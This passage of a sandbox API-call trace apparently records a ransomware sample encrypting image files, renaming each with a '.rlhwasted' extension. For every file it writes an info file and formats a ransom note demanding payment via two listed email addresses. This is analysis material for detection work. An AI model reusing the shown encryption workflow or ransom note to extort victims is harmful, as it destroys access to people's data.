[0196.319] CloseHandle (hObject=0x104) returned 1 [0196.373] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.373] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f1f90 | out: hHeap=0x6b0000) returned 1 [0196.374] _aulldvrm () returned 0x0 [0196.374] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0196.375] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.375] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\cl7NY.png") returned 67 [0196.375] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x290) returned 0x6d4580 [0196.375] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.375] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.375] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0196.376] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.376] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\cl7NY.png.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\cl7ny.png.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.377] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.378] SetEndOfFile (hFile=0x104) returned 1 [0196.379] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.379] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.379] lstrcpyW (in: lpString1=0x6d4606, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\cl7NY.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\cl7ny.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\cl7NY.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\cl7ny.png.rlhwasted")) returned 1 [0196.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\cl7NY.png.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\cl7ny.png.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.380] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.380] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xf3bb [0196.380] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf3bb) returned 0x6a0000 [0196.381] CloseHandle (hObject=0x128) returned 1 [0196.387] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.387] CloseHandle (hObject=0x108) returned 1 [0196.387] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e7f18 [0196.388] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f98) returned 1 [0196.389] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x1b8, pbBuffer=0x6e7f60 | out: pbBuffer=0x6e7f60) returned 1 [0196.389] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.389] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f98) returned 1 [0196.390] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.390] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.400] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8428 [0196.400] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7f18 | out: hHeap=0x6b0000) returned 1 [0196.400] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.400] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]GWBFYs5HTe4wTVLeLkLhE9z0vbVQJ8X8ig09DS9zS8jpPwadD4f7+rg7luWkzrDG\r\nHjF78zA0btMnWCz0Oag33wLNcwTos+2Ylpz1JM+mZlVTX3MDcEIff0CZHmX2SgPu\r\nSanZCyHPCupJTU5oYXN76fa1FxmESb6oOKUvQ4aNRvKD+db6Am1sekaFq2q0XPzo\r\ngFhkh8fVGdiH81NxKkKHj5lNPoeWT53SuNo+vpSy6Zn+yDG+JvclACxEvxCvu+01\r\ng/D2sJypkx73Qd5gR80HeEj8KE9QNhwrZPlRTfEQc+d2s3Fs4iARPrAJ/DWX9BkF\r\n+Wik+QYaqHkjTbV0hZjxh9Zd+TYf/+cWVGxiOJRC27aHLFmzD35JoSPOc79v9JKO\r\nD7ksOwj2SHf3EWBbZaxW3Wder/FHZaurAzEvOjdcXVZ96OSyCOqKZLx/g2FbWCyk\r\n33nXAzjxPlo/kcTvdmGjuhJRkCWdvnIaQq9hG+/xsghAR7QrEdVUniSF3n8/VMMP\r\n62pmjMNdHrhbYey7QHRLribINphFRtw5BYDlS5S0BFZ8u7Yz6J+DBqCzpCtwZlFr\r\ncUzYQjW9oW7GyqArLbBuVz/S8nSR4jOtvt4HrnxqAcAJxsdIHO6H1tN4tC1ibjM6\r\nPCOWhccvGmSU9NcgA9zPlkP8sj9YdzeZVOlTqqM2mw0=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.400] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8428 | out: hHeap=0x6b0000) returned 1 [0196.400] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.401] SetEndOfFile (hFile=0x104) returned 1 [0196.403] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.403] CloseHandle (hObject=0x104) returned 1 [0196.405] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0196.406] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f2070 | out: hHeap=0x6b0000) returned 1 [0196.406] _aulldvrm () returned 0x0 [0196.406] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f98) returned 1 [0196.407] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.407] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\fjD4Bz_CQDuU9F5rmp.gif") returned 80 [0196.407] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2aa) returned 0x70cfe8 [0196.407] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.407] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.407] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f98) returned 1 [0196.408] CryptGenRandom (in: hProv=0x6f6f98, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.408] CryptReleaseContext (hProv=0x6f6f98, dwFlags=0x0) returned 1 [0196.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\fjD4Bz_CQDuU9F5rmp.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\fjd4bz_cqduu9f5rmp.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.409] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.410] SetEndOfFile (hFile=0x104) returned 1 [0196.411] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.411] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.411] lstrcpyW (in: lpString1=0x70d088, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.411] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\fjD4Bz_CQDuU9F5rmp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\fjd4bz_cqduu9f5rmp.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\fjD4Bz_CQDuU9F5rmp.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\fjd4bz_cqduu9f5rmp.gif.rlhwasted")) returned 1 [0196.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\fjD4Bz_CQDuU9F5rmp.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\fjd4bz_cqduu9f5rmp.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.412] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.412] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0xc709 [0196.413] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc709) returned 0x6a0000 [0196.413] CloseHandle (hObject=0x108) returned 1 [0196.442] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.442] CloseHandle (hObject=0x128) returned 1 [0196.442] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.442] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.443] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.443] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.443] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.444] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.444] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.455] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.455] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.455] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.455] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]j58cA0DTuUT4gj7RG3nDNQZpiu0CHzXv+J66lKph3JS602hViBQeiBpu9LEWPzPF\r\n0BHpHkKgcBW4t6krQJI53pFgDu6NE0gQYUffNz4VYplua9y6w9A9Q52pfCuFdvqk\r\n+MXnCg0fNF48ehfCznKcpErvbmodOQf6Z7mzwE8TI7RHSnmuPwMpkjB45qlQbDmV\r\nGc1WX1reHMsrcYCi8bWpEflIR1/J5fFG6pE00LVbj6n5Pmw9sfXjC1mCRuYYhR/U\r\nKK2KK2eLwXfeHq8J+qNwpC8yTg2mBa2Ku8GXh1idLo4Xrnd5pXweqYJK/SwG/U06\r\nXK3rjDMgPK3Z1YGMGBPMagIBmRWYWZaqLSzoWS7tCuTO/DoJbLRXXEW4EzdE52Tz\r\nsxgUCQ/B+DKc0hF8+8ouU+kl8d0XXOwTe/LawdOii4NHfP9nFU72/dweWHapf5q6\r\n49iBQEUSHQX8vt4fwMTHulLf9HHcAyvsMtHpRSEUseFntN4G0XKMXqAjY2k0gj0e\r\nMz8nBRhxxBOAa0L9PzannB5bOWH8bRraWC9ULyDDJFH5jhVSatWD/g87pdt2XKHX\r\nFTaYDkmJHmastqjo6Fur6p+g1mBgyWd6WrgP/vcwVUcogKujPMGXlBGQLe8uy6Om\r\nYw4YcdSczU2ztwQxEocdB5TEMHr6CImzs01zydQ2eKU=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.455] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.455] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.455] SetEndOfFile (hFile=0x104) returned 1 [0196.509] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.509] CloseHandle (hObject=0x104) returned 1 [0196.511] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0196.511] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700d68 | out: hHeap=0x6b0000) returned 1 [0196.511] _aulldvrm () returned 0x0 [0196.511] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.512] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.512] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.512] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\n-2Qr01VUiT39cWFiXA.bmp") returned 81 [0196.513] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0196.513] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.513] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.513] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.514] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.514] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.514] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\n-2Qr01VUiT39cWFiXA.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\n-2qr01vuit39cwfixa.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.515] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.516] SetEndOfFile (hFile=0x104) returned 1 [0196.516] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.516] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.516] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\n-2Qr01VUiT39cWFiXA.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\n-2qr01vuit39cwfixa.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\n-2Qr01VUiT39cWFiXA.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\n-2qr01vuit39cwfixa.bmp.rlhwasted")) returned 1 [0196.517] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\dHJCXBANp2Ve44\\n-2Qr01VUiT39cWFiXA.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\dhjcxbanp2ve44\\n-2qr01vuit39cwfixa.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.517] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.518] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x3ae7 [0196.518] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ae7) returned 0x6a0000 [0196.518] CloseHandle (hObject=0x128) returned 1 [0196.521] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.570] CloseHandle (hObject=0x108) returned 1 [0196.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.570] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.571] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.571] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.571] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.571] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.572] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.580] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.580] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.580] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.580] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Fk8bNVnNPv8izB92uFJQYLLOPtf/ln4uDHUoFxC6nZ9+6/x2QIYZ0XKbH3V7pUZR\r\njRybgo+zw0iFfLvssc3dgIk1jBH3mm1glwR4DCd5rWuupAZy+96PsDOq1MkLsNmW\r\nsuSxTQDHR5hLqUgzH8bgGXTmUO+vQW2UQLsys2qGMAab5aw7BrpY/+Gq+jas69jg\r\nDlau72ZNJxbxcc0UgWbyEQRe2Lf9t7BSOejWHnmo/tnZqEmDYVdJExW6hq2rEsV+\r\nmDnOeptrg3nrjnN4VmX2qe02DWY8dmXCpHYcZTJfYTUjAmUAvVHGlc42fuiSbKiX\r\ntCTG4j8cHdk7jnuq1VfdvezzssUORUJ/+eHum0z4t7s7TmYiuPzBXzOYUjr31SVB\r\nc5fjT5Da6CuILai7a3iD/WY9IvdOQjVxCCNcp/VuhEWPMQ+8jf+JJJeek8DUU/N1\r\nlN9uA4uHROgI72xYkIirjg8m9l3rph1Oa0Sol+ueDIYFtoao6E5S96IzASLiizQj\r\nB6GOk7LOiINnMjxRFiZP4BiJSxDez3y9KYordez8MbbdYrVZeKRaW0Zy0lp67isq\r\ncTIlG7NBU5l6ZDhS37DadpGDPrc+aWDSJue2GzrsVzLShDREZ9X+2XPKyuY3tN5f\r\ngR6ktq88T+uxRwqgWxj1XF/tobaFw9m3+fVh+ArehMj=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.580] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.580] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.580] SetEndOfFile (hFile=0x104) returned 1 [0196.583] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.583] CloseHandle (hObject=0x104) returned 1 [0196.585] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0196.585] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x700e68 | out: hHeap=0x6b0000) returned 1 [0196.586] _aulldvrm () returned 0x0 [0196.586] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.587] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.587] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\frN_rEyvxkVVxYzm.bmp") returned 63 [0196.587] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x288) returned 0x6e7988 [0196.587] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.587] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.587] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.588] CryptGenRandom 